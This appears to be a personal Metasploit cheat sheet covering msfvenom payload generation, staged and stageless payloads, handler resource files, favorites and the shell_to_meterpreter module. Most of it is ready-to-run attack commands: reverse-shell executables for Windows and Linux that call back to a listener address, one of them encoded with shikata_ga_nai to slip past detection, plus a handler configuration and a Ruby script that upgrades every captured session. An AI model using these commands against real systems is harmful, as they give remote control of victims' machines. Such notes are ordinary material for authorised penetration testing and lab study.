Metasploit
Msfvenom
List payloads: msfvenom --list payloads
# Windows (EXE)
$ msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe
# Windows (x86 EXE with encoder)
$ msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.52.138 LPORT=9001 -f exe -o shell.exe
# Linux (ELF)
$ msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=10.9.52.138 LPORT=9001 -f elf -o shell.bin
staged: 2 parts. A small stager runs on the target and connects back to the listener, which then sends the rest of the payload (the stage) to it. Staged payload names use a slash, e.g. windows/meterpreter/reverse_tcp.
stageless: the complete reverse shell is directly inside the payload, nothing is fetched at runtime. Stageless payload names use an underscore, e.g. windows/x64/meterpreter_reverse_tcp.
Resource file
File listener.rc:
use exploit/multi/handler
set LHOST tun0
set LPORT 9001
set payload windows/x64/meterpreter_reverse_tcp
exploit -j
Command: msfconsole -r listener.rc
Use Ruby inside a resource file.
File shell2meterpreter.rc:
<ruby>
framework.sessions.each_pair do |sid, session|
  run_single("use post/multi/manage/shell_to_meterpreter")
  run_single("set SESSION #{sid}")
  run_single("run")
end
</ruby>
The block loops over every open session and runs post/multi/manage/shell_to_meterpreter against each one. Load it from the console:
msf6 > resource shell2meterpreter.rc
[*] Processing /tmp/shell2meterpreter.rc for ERB directives.
[*] resource (/tmp/shell2meterpreter.rc)> Ruby Code (165 bytes)
Favorites
Add the current module to favorites:
msf6 exploit(multi/handler) > favorite
[+] Added exploit/multi/handler to the favorite modules file
Show favorites:
msf6 > show favorites
Favorites
=========
#  Name                                      Disclosure Date  Rank     Check  Description
-  ----                                      ---------------  ----     -----  -----------
0  exploit/multi/handler                                      manual   No     Generic Payload Handler
1  exploit/windows/smb/ms17_010_eternalblue  2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
Delete a favorite:
msf6 > favorite -d exploit/multi/handler
[*] Removing exploit/multi/handler from the favorite modules file
Modules
shell_to_meterpreter
msf6 > use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > set session 1
session => 1
msf6 post(multi/manage/shell_to_meterpreter) > set LPORT 4445
LPORT => 4445
msf6 post(multi/manage/shell_to_meterpreter) > run